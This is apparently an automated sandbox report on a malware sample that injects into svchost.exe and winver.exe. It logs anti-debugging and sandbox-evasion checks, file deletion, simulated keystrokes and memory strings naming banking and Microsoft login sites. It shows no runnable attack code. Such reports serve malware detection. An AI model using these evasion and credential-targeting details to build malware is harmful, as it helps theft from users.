Source:	Binary string: wntdll.pdb source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp

Source: aBEh0fsi2c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: aBEh0fsi2c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: aBEh0fsi2c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: aBEh0fsi2c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: aBEh0fsi2c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00364B37 LoadLibraryA,GetProcAddress,

0_2_00364B37

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0036C4FE push A30036BAh; retn 0036h	0_2_0036C50D
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00388945 push ecx; ret	0_2_00388958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411948 push ss; retf	2_2_0041194E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040214C pushad ; retf	2_2_0040214D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416AAC push esp; retf	2_2_00416AAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413B33 pushfd ; ret	2_2_00413B79
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004033E0 push eax; ret	2_2_004033E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004144FC push edi; retf	2_2_004144FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415D23 push 00000009h; retn 3081h	2_2_00415DC4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408695 push edx; retf	2_2_004086AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004086AF push edx; retf	2_2_004086AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx	2_2_03A309B6

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_003648D7
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_003E5376

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00383187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00383187

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	API/Special instruction interceptor: Address: E7970C
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\winver.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03A7096E rdtsc

2_2_03A7096E

Source: C:\Windows\SysWOW64\winver.exe

Window / User API: threadDelayed 9841

Jump to behavior

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102344

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\winver.exe TID: 7940	Thread sleep count: 132 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe TID: 7940	Thread sleep time: -264000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe TID: 7940	Thread sleep count: 9841 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe TID: 7940	Thread sleep time: -19682000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe TID: 5980	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\winver.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_003C445A
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CC6D1 FindFirstFileW,FindClose,	0_2_003CC6D1
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_003CC75C
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003CEF95
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003CF0F2
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003CF3F3
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003C37EF
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003C3B12
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003CBCBC

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003649A0

Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 341G64J42.5.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 341G64J42.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: 341G64J42.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 341G64J42.5.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 341G64J42.5.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 341G64J42.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: 341G64J42.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: winver.exe, 00000005.00000002.2550854320.0000000003015000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000002.2555520009.000000000106F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2020800186.00000185E190D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: 341G64J42.5.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 341G64J42.5.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 341G64J42.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 341G64J42.5.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 341G64J42.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 341G64J42.5.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 341G64J42.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 341G64J42.5.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: 341G64J42.5.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: 341G64J42.5.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	API call chain: ExitProcess graph end node			graph_0-100778
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	API call chain: ExitProcess graph end node			graph_0-100880

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03A7096E rdtsc

2_2_03A7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417A83 LdrLoadDll,

2_2_00417A83

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003D3F09 BlockInput,

0_2_003D3F09

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00363B3A

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00395A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00395A7C

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00364B37 LoadLibraryA,GetProcAddress,

0_2_00364B37

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00E78338 mov eax, dword ptr fs:[00000030h]	0_2_00E78338
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00E799D8 mov eax, dword ptr fs:[00000030h]	0_2_00E799D8
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00E79978 mov eax, dword ptr fs:[00000030h]	0_2_00E79978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]	2_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]	2_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]	2_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]	2_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]	2_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
